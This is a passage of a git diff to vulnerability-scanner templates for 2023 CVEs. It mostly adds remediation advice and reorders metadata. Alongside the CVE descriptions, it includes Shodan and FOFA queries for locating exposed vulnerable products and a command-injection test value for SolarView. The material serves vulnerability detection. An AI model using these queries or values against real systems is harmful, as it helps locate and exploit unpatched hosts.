https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/KubePi/KubePi%20LoginLogsSearch%20%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%20CVE-2023-22478.md - https://nvd.nist.gov/vuln/detail/CVE-2023-22478 @@ -18,15 +20,15 @@ info: cve-id: CVE-2023-22478 cwe-id: CWE-862 epss-score: 0.01048 - cpe: cpe:2.3:a:fit2cloud:kubepi:*:*:*:*:*:*:*:* epss-percentile: 0.82159 + cpe: cpe:2.3:a:fit2cloud:kubepi:*:*:*:*:*:*:*:* metadata: - max-request: 1 - fofa-query: "kubepi" - shodan-query: html:"kubepi" verified: true + max-request: 1 vendor: fit2cloud product: kubepi + shodan-query: html:"kubepi" + fofa-query: "kubepi" tags: cve,cve2023,kubepi,k8s,exposure http: diff --git a/http/cves/2023/CVE-2023-22480.yaml b/http/cves/2023/CVE-2023-22480.yaml index e25685f1e9..15aa673510 100644 --- a/http/cves/2023/CVE-2023-22480.yaml +++ b/http/cves/2023/CVE-2023-22480.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | KubeOperator is an open source Kubernetes distribution focused on helping enterprises plan, deploy and operate production-level K8s clusters. In KubeOperator versions 3.16.3 and below, API interfaces with unauthorized entities and can leak sensitive information. This vulnerability could be used to take over the cluster under certain conditions. This issue has been patched in version 3.16.4. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/KubeOperator/KubeOperator/security/advisories/GHSA-jxgp-jgh3-8jc8 - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/KubeOperator/KubeOperator%20kubeconfig%20%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%20CVE-2023-22480.md?plain=1 @@ -18,15 +20,15 @@ info: cve-id: CVE-2023-22480 cwe-id: CWE-863,CWE-285 epss-score: 0.00724 - cpe: cpe:2.3:a:fit2cloud:kubeoperator:*:*:*:*:*:*:*:* epss-percentile: 0.78239 + cpe: cpe:2.3:a:fit2cloud:kubeoperator:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: html:"KubeOperator" - fofa-query: app="KubeOperator" + max-request: 1 vendor: fit2cloud product: kubeoperator + shodan-query: html:"KubeOperator" + fofa-query: app="KubeOperator" tags: cve,cve2023,kubeoperator,k8s,kubeconfig,exposure http: diff --git a/http/cves/2023/CVE-2023-2252.yaml b/http/cves/2023/CVE-2023-2252.yaml index 346f3896c4..dc0101ad52 100644 --- a/http/cves/2023/CVE-2023-2252.yaml +++ b/http/cves/2023/CVE-2023-2252.yaml @@ -6,14 +6,14 @@ info: severity: medium description: | Directorist before 7.5.4 is susceptible to Local File Inclusion as it does not validate the file parameter when importing CSV files. + remediation: Fixed in version 7.5.4 reference: - https://wpscan.com/vulnerability/9da6eede-10d0-4609-8b97-4a5d38fa8e69 - https://wordpress.org/plugins/directorist/advanced/ - https://nvd.nist.gov/vuln/detail/CVE-2023-2252 - remediation: Fixed in version 7.5.4 metadata: - max-request: 2 verified: true + max-request: 2 tags: wpscan,cve,cve2023,lfi,directorist,wordpress,wp-plugin,wp,authenticated http: diff --git a/http/cves/2023/CVE-2023-22620.yaml b/http/cves/2023/CVE-2023-22620.yaml index a03b7606f5..f1c7ddba27 100644 --- a/http/cves/2023/CVE-2023-22620.yaml +++ b/http/cves/2023/CVE-2023-22620.yaml @@ -6,27 +6,27 @@ info: severity: high description: | An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows sessionid information disclosure via an invalid authentication attempt. This can afterwards be used to bypass the device's authentication and get access to the administrative interface. + remediation: Upgrade to version 12.2.5.1 or newer reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-22620 - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2023-22620.txt - https://www.rcesecurity.com/2023/04/securepwn-part-1-bypassing-securepoint-utms-authentication-cve-2023-22620/ - https://packetstormsecurity.com/files/171924/SecurePoint-UTM-12.x-Session-ID-Leak.html - https://rcesecurity.com - remediation: Upgrade to version 12.2.5.1 or newer classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 7.5 cve-id: CVE-2023-22620 cwe-id: CWE-863 epss-score: 0.00876 - cpe: cpe:2.3:o:securepoint:unified_threat_management:*:*:*:*:*:*:*:* epss-percentile: 0.80371 + cpe: cpe:2.3:o:securepoint:unified_threat_management:*:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true - shodan-query: title:"Securepoint UTM" + max-request: 2 vendor: securepoint product: unified_threat_management + shodan-query: title:"Securepoint UTM" tags: utm,leak,memory,packetstorm,cve,cve2023,securepoint http: diff --git a/http/cves/2023/CVE-2023-2272.yaml b/http/cves/2023/CVE-2023-2272.yaml index 10fe61be34..4d09d119cd 100644 --- a/http/cves/2023/CVE-2023-2272.yaml +++ b/http/cves/2023/CVE-2023-2272.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Tiempo.com before 0.1.2 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Upgrade to a patched version of Tiempo.com (version 0.1.3 or above) that addresses the XSS vulnerability. reference: - https://wpscan.com/vulnerability/dba60216-2753-40b7-8f2b-6caeba684b2e - https://wordpress.org/plugins/tiempocom/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2023-2272 cwe-id: CWE-79 epss-score: 0.00071 - cpe: cpe:2.3:a:tiempo:tiempo:*:*:*:*:*:wordpress:*:* epss-percentile: 0.29286 + cpe: cpe:2.3:a:tiempo:tiempo:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: tiempo product: tiempo + framework: wordpress tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,authenticated,xss,tiempocom http: diff --git a/http/cves/2023/CVE-2023-22897.yaml b/http/cves/2023/CVE-2023-22897.yaml index 2b20079304..573538e395 100644 --- a/http/cves/2023/CVE-2023-22897.yaml +++ b/http/cves/2023/CVE-2023-22897.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows information disclosure of memory contents to be achieved by an authenticated user. Essentially, uninitialized data can be retrieved via an approach in which a sessionid is obtained but not used. + remediation: | + Apply the latest security patches and updates provided by Securepoint to fix the memory leakage issue. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-22897 - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2023-22897.txt @@ -17,14 +19,14 @@ info: cve-id: CVE-2023-22897 cwe-id: CWE-908 epss-score: 0.00853 - cpe: cpe:2.3:o:securepoint:unified_threat_management:*:*:*:*:*:*:*:* epss-percentile: 0.80108 + cpe: cpe:2.3:o:securepoint:unified_threat_management:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: title:"Securepoint UTM" + max-request: 1 vendor: securepoint product: unified_threat_management + shodan-query: title:"Securepoint UTM" tags: cve,cve2023,securepoint,utm,exposure,memory http: diff --git a/http/cves/2023/CVE-2023-23161.yaml b/http/cves/2023/CVE-2023-23161.yaml index 8427d597e9..169dac7424 100644 --- a/http/cves/2023/CVE-2023-23161.yaml +++ b/http/cves/2023/CVE-2023-23161.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A reflected cross-site scripting (XSS) vulnerability in Art Gallery Management System Project v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the artname parameter under ART TYPE option in the navigation bar. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/51214 - https://github.com/rahulpatwari/CVE/blob/main/CVE-2023-23161/CVE-2023-23161.txt @@ -18,14 +20,14 @@ info: cve-id: CVE-2023-23161 cwe-id: CWE-79 epss-score: 0.00104 - cpe: cpe:2.3:a:art_gallery_management_system_project:art_gallery_management_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.41822 + cpe: cpe:2.3:a:art_gallery_management_system_project:art_gallery_management_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - fofa-query: title="Art Gallery Management System" + max-request: 1 vendor: art_gallery_management_system_project product: art_gallery_management_system + fofa-query: title="Art Gallery Management System" tags: packetstorm,cve,cve2023,art,gallery,xss http: diff --git a/http/cves/2023/CVE-2023-23333.yaml b/http/cves/2023/CVE-2023-23333.yaml index ffe056c0cb..01aac8f17f 100644 --- a/http/cves/2023/CVE-2023-23333.yaml +++ b/http/cves/2023/CVE-2023-23333.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | SolarView Compact 6.00 was discovered to contain a command injection vulnerability, attackers can execute commands by bypassing internal restrictions through downloader.php. + remediation: | + Apply the latest patch or update provided by the vendor to fix the OS command injection vulnerability in SolarView Compact 6.00. reference: - https://github.com/Timorlover/CVE-2023-23333 - https://github.com/Mr-xn/CVE-2023-23333 @@ -16,15 +18,15 @@ info: cve-id: CVE-2023-23333 cwe-id: CWE-77 epss-score: 0.63981 - cpe: cpe:2.3:o:contec:solarview_compact_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.97411 + cpe: cpe:2.3:o:contec:solarview_compact_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: http.html:"SolarView Compact" - fofa-query: body="SolarView Compact" && title="Top" + max-request: 1 vendor: contec product: solarview_compact_firmware + shodan-query: http.html:"SolarView Compact" + fofa-query: body="SolarView Compact" && title="Top" tags: cve,cve2023,solarview,rce variables: cmd: "echo+CVE-2023-23333|rev" diff --git a/http/cves/2023/CVE-2023-23488.yaml b/http/cves/2023/CVE-2023-23488.yaml index a08544daa1..4824530442 100644 --- a/http/cves/2023/CVE-2023-23488.yaml +++ b/http/cves/2023/CVE-2023-23488.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Paid Memberships Pro plugin before 2.9.8 contains a blind SQL injection vulnerability in the 'code' parameter of the /pmpro/v1/order REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Upgrade to WordPress Paid Memberships Pro version 2.9.8 or later to mitigate this vulnerability. reference: - https://www.tenable.com/security/research/tra-2023-2 - https://wordpress.org/plugins/paid-memberships-pro/ @@ -17,14 +19,14 @@ info: cve-id: CVE-2023-23488 cwe-id: CWE-89 epss-score: 0.02173 - cpe: cpe:2.3:a:strangerstudios:paid_memberships_pro:*:*:*:*:*:wordpress:*:* epss-percentile: 0.87935 + cpe: cpe:2.3:a:strangerstudios:paid_memberships_pro:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: strangerstudios product: paid_memberships_pro + framework: wordpress tags: paid-memberships-pro,cve2023,wordpress,tenable,packetstorm,wp-plugin,sqli,cve,wp http: diff --git a/http/cves/2023/CVE-2023-23489.yaml b/http/cves/2023/CVE-2023-23489.yaml index 5f1d6c37c5..f6af90eb2b 100644 --- a/http/cves/2023/CVE-2023-23489.yaml +++ b/http/cves/2023/CVE-2023-23489.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Easy Digital Downloads plugin 3.1.0.2 and 3.1.0.3 contains a SQL injection vulnerability in the s parameter of its edd_download_search action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Update to the latest version of Easy Digital Downloads plugin (3.1.0.4 or higher) to mitigate the SQL Injection vulnerability. reference: - https://wpscan.com/vulnerability/c5a6830c-6420-42fc-b20c-8e20224d6f18 - https://wordpress.org/plugins/easy-digital-downloads/ @@ -17,14 +19,14 @@ info: cve-id: CVE-2023-23489 cwe-id: CWE-89 epss-score: 0.22685 - cpe: cpe:2.3:a:sandhillsdev:easy_digital_downloads:*:*:*:*:*:wordpress:*:* epss-percentile: 0.95881 + cpe: cpe:2.3:a:sandhillsdev:easy_digital_downloads:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: sandhillsdev product: easy_digital_downloads + framework: wordpress tags: easy-digital-downloads,unauth,cve,wpscan,wordpress,wp,wp-plugin,cve2023,sqli,tenable http: diff --git a/http/cves/2023/CVE-2023-23491.yaml b/http/cves/2023/CVE-2023-23491.yaml index d2b5caaae7..2b3d06081b 100644 --- a/http/cves/2023/CVE-2023-23491.yaml +++ b/http/cves/2023/CVE-2023-23491.yaml @@ -6,25 +6,25 @@ info: severity: medium description: | The Quick Event Manager WordPress Plugin, version < 9.7.5, is affected by a reflected cross-site scripting vulnerability in the 'category' parameter of its 'qem_ajax_calendar' action. + remediation: Fixed in version 9.7.5 and above reference: - https://wpscan.com/vulnerability/49178a9d-0500-4e3e-8ea1-6cd4eeda2a4e - https://nvd.nist.gov/vuln/detail/CVE-2023-23491 - remediation: Fixed in version 9.7.5 and above classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-23491 cwe-id: CWE-79 epss-score: 0.00064 - cpe: cpe:2.3:a:fullworksplugins:quick_event_manager:*:*:*:*:*:wordpress:*:* epss-percentile: 0.26173 + cpe: cpe:2.3:a:fullworksplugins:quick_event_manager:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - publicwww-query: "/wp-content/plugins/quick-event-manager" - framework: wordpress + max-request: 1 vendor: fullworksplugins product: quick_event_manager + framework: wordpress + publicwww-query: "/wp-content/plugins/quick-event-manager" tags: cve,cve2023,wordpress,wp,wp-plugin,wpscan,xss,quick-event-manager http: diff --git a/http/cves/2023/CVE-2023-23492.yaml b/http/cves/2023/CVE-2023-23492.yaml index 3a9ae4c8c4..99f0ce41f5 100644 --- a/http/cves/2023/CVE-2023-23492.yaml +++ b/http/cves/2023/CVE-2023-23492.yaml @@ -6,8 +6,8 @@ info: severity: high description: | Login with Phone Number, versions < 1.4.2, is affected by an reflected XSS vulnerability in the login-with-phonenumber.php' file in the 'lwp_forgot_password()' function. - - Note that CVE-2023-23492 incorrectly describes and scores this as SQL injection vulnerability. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://wordpress.org/plugins/login-with-phone-number/ - https://www.tenable.com/security/research/tra-2023-3 @@ -18,14 +18,14 @@ info: cve-id: CVE-2023-23492 cwe-id: CWE-89 epss-score: 0.03531 - cpe: cpe:2.3:a:login_with_phone_number_project:login_with_phone_number:*:*:*:*:*:wordpress:*:* epss-percentile: 0.90359 + cpe: cpe:2.3:a:login_with_phone_number_project:login_with_phone_number:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: login_with_phone_number_project product: login_with_phone_number + framework: wordpress tags: login-with-phonenumber,wordpress,wp,wp-plugin,xss,tenable,cve,cve2023 http: diff --git a/http/cves/2023/CVE-2023-2356.yaml b/http/cves/2023/CVE-2023-2356.yaml index 3753a87c20..272a4d6022 100644 --- a/http/cves/2023/CVE-2023-2356.yaml +++ b/http/cves/2023/CVE-2023-2356.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Relative Path Traversal in GitHub repository mlflow/mlflow prior to 2.3.1. + remediation: | + Upgrade Mlflow to version 2.3.0 or above to mitigate the vulnerability. reference: - https://huntr.dev/bounties/7b5d130d-38eb-4133-8c7d-0dfc9a9d9896/ - https://nvd.nist.gov/vuln/detail/CVE-2023-2356 @@ -16,15 +18,15 @@ info: cve-id: CVE-2023-2356 cwe-id: CWE-23 epss-score: 0.00941 - cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* epss-percentile: 0.81132 + cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: - fofa-query: app="MLflow" - max-request: 3 - shodan-query: http.title:"mlflow" verified: true + max-request: 3 vendor: lfprojects product: mlflow + shodan-query: http.title:"mlflow" + fofa-query: app="MLflow" tags: cve,cve2023,lfi,huntr,mlflow,oss,intrusive variables: str: "{{rand_base(6)}}" diff --git a/http/cves/2023/CVE-2023-23752.yaml b/http/cves/2023/CVE-2023-23752.yaml index 21acbee659..fa678439d2 100644 --- a/http/cves/2023/CVE-2023-23752.yaml +++ b/http/cves/2023/CVE-2023-23752.yaml @@ -6,25 +6,25 @@ info: severity: medium description: | An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints. + remediation: Upgrade to Joomla! version 4.2.8 or later. reference: - https://unsafe.sh/go-149780.html - https://twitter.com/gov_hack/status/1626471960141238272/photo/1 - https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html - https://nvd.nist.gov/vuln/detail/CVE-2023-23552 - remediation: Upgrade to Joomla! version 4.2.8 or later. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2023-23752 epss-score: 0.49602 - cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* epss-percentile: 0.97062 + cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* metadata: - max-request: 2 - shodan-query: html:"Joomla! - Open Source Content Management" verified: true + max-request: 2 vendor: joomla product: joomla\! + shodan-query: html:"Joomla! - Open Source Content Management" tags: cve,cve2023,joomla http: diff --git a/http/cves/2023/CVE-2023-24044.yaml b/http/cves/2023/CVE-2023-24044.yaml index 9895c9fd6d..5f45303bd9 100644 --- a/http/cves/2023/CVE-2023-24044.yaml +++ b/http/cves/2023/CVE-2023-24044.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Plesk Obsidian through 18.0.49 contains an open redirect vulnerability via the login page. An attacker can redirect users to malicious websites via a host request header and thereby access user credentials and execute unauthorized operations. NOTE: The vendor's position is "the ability to use arbitrary domain names to access the panel is an intended feature." + remediation: | + Upgrade Plesk Obsidian to a version higher than 18.0.49 to mitigate the vulnerability. reference: - https://portswigger.net/web-security/host-header/exploiting - https://medium.com/@jetnipat.tho/cve-2023-24044-10e48ab940d8 @@ -18,15 +20,15 @@ info: cve-id: CVE-2023-24044 cwe-id: CWE-601 epss-score: 0.00114 - cpe: cpe:2.3:a:plesk:obsidian:*:*:*:*:*:*:*:* epss-percentile: 0.44165 + cpe: cpe:2.3:a:plesk:obsidian:*:*:*:*:*:*:*:* metadata: - max-request: 1 - fofa-query: title="Plesk Obsidian" - shodan-query: title:"Plesk Obsidian" verified: true + max-request: 1 vendor: plesk product: obsidian + shodan-query: title:"Plesk Obsidian" + fofa-query: title="Plesk Obsidian" tags: cve,cve2023,header,injection,plesk,obsidian http: diff --git a/http/cves/2023/CVE-2023-24243.yaml b/http/cves/2023/CVE-2023-24243.yaml index 00e7770053..c8aef5e22e 100644 --- a/http/cves/2023/CVE-2023-24243.yaml +++ b/http/cves/2023/CVE-2023-24243.yaml @@ -6,6 +6,8 @@ info: severity: high description: | CData RSB Connect v22.0.8336 was discovered to contain a Server-Side Request Forgery (SSRF). + remediation: | + Apply the latest security patches or updates provided by CData to fix the SSRF vulnerability in RSB Connect v22.0.8336. reference: - https://twitter.com/W01fh4cker/status/1669890019191037952 - https://gist.github.com/d3vc0r3/6460a5f006e32a2ebffe739e411ab1b8 @@ -18,15 +20,15 @@ info: cve-id: CVE-2023-24243 cwe-id: CWE-918 epss-score: 0.00448 - cpe: cpe:2.3:a:cdata:arc:*:*:*:*:*:*:*:* epss-percentile: 0.71868 + cpe: cpe:2.3:a:cdata:arc:*:*:*:*:*:*:*:* metadata: - fofa-query: icon_hash="163538942" - max-request: 1 - shodan-query: http.favicon.hash:163538942 verified: true + max-request: 1 vendor: cdata product: arc + shodan-query: http.favicon.hash:163538942 + fofa-query: icon_hash="163538942" tags: cve,cve2023,cdata,rsb,ssrf http: diff --git a/http/cves/2023/CVE-2023-24278.yaml b/http/cves/2023/CVE-2023-24278.yaml index 85ccbc7c73..b8f277d126 100644 --- a/http/cves/2023/CVE-2023-24278.yaml +++ b/http/cves/2023/CVE-2023-24278.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Squidex before 7.4.0 contains a cross-site scripting vulnerability via the squid.svg endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Upgrade to Squidex CMS version 7.4.0 or later to mitigate this vulnerability. reference: - https://census-labs.com/news/2023/03/16/reflected-xss-vulnerabilities-in-squidex-squidsvg-endpoint/ - https://www.openwall.com/lists/oss-security/2023/03/16/1 @@ -16,14 +18,14 @@ info: cve-id: CVE-2023-24278 cwe-id: CWE-79 epss-score: 0.0009 - cpe: cpe:2.3:a:squidex.io:squidex:*:*:*:*:*:*:*:* epss-percentile: 0.37279 + cpe: cpe:2.3:a:squidex.io:squidex:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.favicon.hash:1099097618 verified: true + max-request: 1 vendor: squidex.io product: squidex + shodan-query: http.favicon.hash:1099097618 tags: cve,cve2023,xss,squidex,cms,unauth http: diff --git a/http/cves/2023/CVE-2023-24322.yaml b/http/cves/2023/CVE-2023-24322.yaml index 1be2ec92ab..2ce1a1c77b 100644 --- a/http/cves/2023/CVE-2023-24322.yaml +++ b/http/cves/2023/CVE-2023-24322.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | mojoPortal 2.7.0.0 contains a cross-site scripting vulnerability in the FileDialog.aspx component, which can allow an attacker to execute arbitrary web scripts or HTML via a crafted payload injected into the ed and tbi parameters. + remediation: | + Upgrade to a patched version of mojoPortal or apply the necessary security patches to mitigate the XSS vulnerability. reference: - https://github.com/blakduk/Advisories/blob/main/Mojoportal/README.md - https://github.com/i7MEDIA/mojoportal/ @@ -17,14 +19,14 @@ info: cve-id: CVE-2023-24322 cwe-id: CWE-79 epss-score: 0.00077 - cpe: cpe:2.3:a:mojoportal:mojoportal:2.7.0.0:*:*:*:*:*:*:* epss-percentile: 0.31519 + cpe: cpe:2.3:a:mojoportal:mojoportal:2.7.0.0:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: html:"mojoPortal" verified: true + max-request: 1 vendor: mojoportal product: mojoportal + shodan-query: html:"mojoPortal" tags: cves,cve2023,mojoportal,xss http: diff --git a/http/cves/2023/CVE-2023-24367.yaml b/http/cves/2023/CVE-2023-24367.yaml index 070bdfecba..c01677389d 100644 --- a/http/cves/2023/CVE-2023-24367.yaml +++ b/http/cves/2023/CVE-2023-24367.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Temenos T24 release 20 contains a reflected cross-site scripting vulnerability via the routineName parameter at genrequest.jsp. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix this vulnerability. Additionally, implement input validation and output encoding to prevent XSS attacks. reference: - https://github.com/mrojz/T24/blob/main/CVE-2023-24367.md - https://github.com/mrojz/T24/blob/main/T24_XSS.md @@ -16,9 +18,9 @@ info: cve-id: CVE-2023-24367 cwe-id: CWE-79 metadata: + verified: true max-request: 1 shodan-query: title:"T24 Sign in" - verified: true tags: cve,cve2023,xss,temenos http: diff --git a/http/cves/2023/CVE-2023-24488.yaml b/http/cves/2023/CVE-2023-24488.yaml index 0ee4ed3fa9..976a91489e 100644 --- a/http/cves/2023/CVE-2023-24488.yaml +++ b/http/cves/2023/CVE-2023-24488.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Citrix ADC and Citrix Gateway versions before 13.1 and 13.1-45.61, 13.0 and 13.0-90.11, 12.1 and 12.1-65.35 contain a cross-site scripting vulnerability due to improper input validation. + remediation: | + Apply the necessary patches or updates provided by Citrix to mitigate this vulnerability. reference: - https://support.citrix.com/article/CTX477714/citrix-adc-and-citrix-gateway-security-bulletin-for-cve202324487-cve202324488 - https://blog.assetnote.io/2023/06/29/citrix-xss-advisory/ @@ -18,13 +20,13 @@ info: cve-id: CVE-2023-24488 cwe-id: CWE-79 epss-score: 0.01498 - cpe: cpe:2.3:a:citrix:gateway:*:*:*:*:*:*:*:* epss-percentile: 0.85239 + cpe: cpe:2.3:a:citrix:gateway:*:*:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: title:"Citrix Gateway" vendor: citrix product: gateway + shodan-query: title:"Citrix Gateway" tags: cve,cve2023,citrix,xss,adc http: diff --git a/http/cves/2023/CVE-2023-24489.yaml b/http/cves/2023/CVE-2023-24489.yaml index e6129ff9b0..0785a171a4 100644 --- a/http/cves/2023/CVE-2023-24489.yaml +++ b/http/cves/2023/CVE-2023-24489.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A vulnerability has been discovered in the customer-managed ShareFile storage zones controller which, if exploited, could allow an unauthenticated attacker to remotely compromise the customer-managed ShareFile storage zones controller. + remediation: | + Apply the necessary security patches or updates provided by Citrix to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-24489 - https://blog.assetnote.io/2023/07/04/citrix-sharefile-rce/ @@ -15,14 +17,14 @@ info: cvss-score: 9.8 cve-id: CVE-2023-24489 epss-score: 0.9673 - cpe: cpe:2.3:a:citrix:sharefile_storage_zones_controller:*:*:*:*:*:*:*:* epss-percentile: 0.99506 + cpe: cpe:2.3:a:citrix:sharefile_storage_zones_controller:*:*:*:*:*:*:*:* metadata: - max-request: 256 - shodan-query: title:"ShareFile Storage Server" verified: true + max-request: 256 vendor: citrix product: sharefile_storage_zones_controller + shodan-query: title:"ShareFile Storage Server" tags: cve,cve2023,sharefile,rce,intrusive,fileupload,fuzz,kev variables: fileName: '{{rand_base(8)}}' diff --git a/http/cves/2023/CVE-2023-24657.yaml b/http/cves/2023/CVE-2023-24657.yaml index 8002023070..1ca9349ca2 100644 --- a/http/cves/2023/CVE-2023-24657.yaml +++ b/http/cves/2023/CVE-2023-24657.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | phpIPAM 1.6 contains a cross-site scripting vulnerability via the closeClass parameter at /subnet-masks/popup.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Upgrade to a patched version of phpIPAM or apply the necessary security patches provided by the vendor. reference: - https://github.com/phpipam/phpipam/issues/3738 - https://nvd.nist.gov/vuln/detail/CVE-2023-24657 @@ -15,14 +17,14 @@ info: cve-id: CVE-2023-24657 cwe-id: CWE-79 epss-score: 0.00076 - cpe: cpe:2.3:a:phpipam:phpipam:1.6:*:*:*:*:*:*:* epss-percentile: 0.31252 + cpe: cpe:2.3:a:phpipam:phpipam:1.6:*:*:*:*:*:*:* metadata: - max-request: 2 - shodan-query: html:"phpIPAM IP address management" verified: true + max-request: 2 vendor: phpipam product: phpipam + shodan-query: html:"phpIPAM IP address management" tags: cve,cve2023,xss,phpipam,authenticated http: diff --git a/http/cves/2023/CVE-2023-24733.yaml b/http/cves/2023/CVE-2023-24733.yaml index 58e87e394a..4d649f5cc6 100644 --- a/http/cves/2023/CVE-2023-24733.yaml +++ b/http/cves/2023/CVE-2023-24733.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | PMB 7.4.6 contains a cross-site scripting vulnerability via the query parameter at /admin/convert/export_z3950_new.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Apply the latest security patch or upgrade to a non-vulnerable version of PMB. reference: - https://github.com/AetherBlack/CVE/blob/main/PMB/readme.md - https://github.com/AetherBlack/CVE/tree/main/PMB @@ -16,14 +18,14 @@ info: cve-id: CVE-2023-24733 cwe-id: CWE-79 epss-score: 0.00064 - cpe: cpe:2.3:a:pmb_project:pmb:7.4.6:*:*:*:*:*:*:* epss-percentile: 0.26173 + cpe: cpe:2.3:a:pmb_project:pmb:7.4.6:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.favicon.hash:1469328760 verified: true + max-request: 1 vendor: pmb_project product: pmb + shodan-query: http.favicon.hash:1469328760 tags: cve,cve2023,unauth,xss,pmb http: diff --git a/http/cves/2023/CVE-2023-24735.yaml b/http/cves/2023/CVE-2023-24735 2.yaml similarity index 91% rename from http/cves/2023/CVE-2023-24735.yaml rename to http/cves/2023/CVE-2023-24735 2.yaml index 61c06145a3..85caf35c6d 100644 --- a/http/cves/2023/CVE-2023-24735.yaml +++ b/http/cves/2023/CVE-2023-24735 2.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | PMB v7.4.6 contains an open redirect vulnerability via the component /opac_css/pmb.php. An attacker can redirect a user to an external domain via a crafted URL and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade PMB to a version that has addressed the open redirect vulnerability (CVE-2023-24735). reference: - https://github.com/AetherBlack/CVE/blob/main/PMB/readme.md - https://github.com/AetherBlack/CVE/tree/main/PMB @@ -16,14 +18,14 @@ info: cve-id: CVE-2023-24735 cwe-id: CWE-601 epss-score: 0.00985 - cpe: cpe:2.3:a:pmb_project:pmb:7.4.6:*:*:*:*:*:*:* epss-percentile: 0.81565 + cpe: cpe:2.3:a:pmb_project:pmb:7.4.6:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.favicon.hash:1469328760 verified: true + max-request: 1 vendor: pmb_project product: pmb + shodan-query: http.favicon.hash:1469328760 tags: cve,cve2023,redirect,pmb http: diff --git a/http/cves/2023/CVE-2023-24737.yaml b/http/cves/2023/CVE-2023-24737.yaml index c0a520b74d..56df907e6f 100644 --- 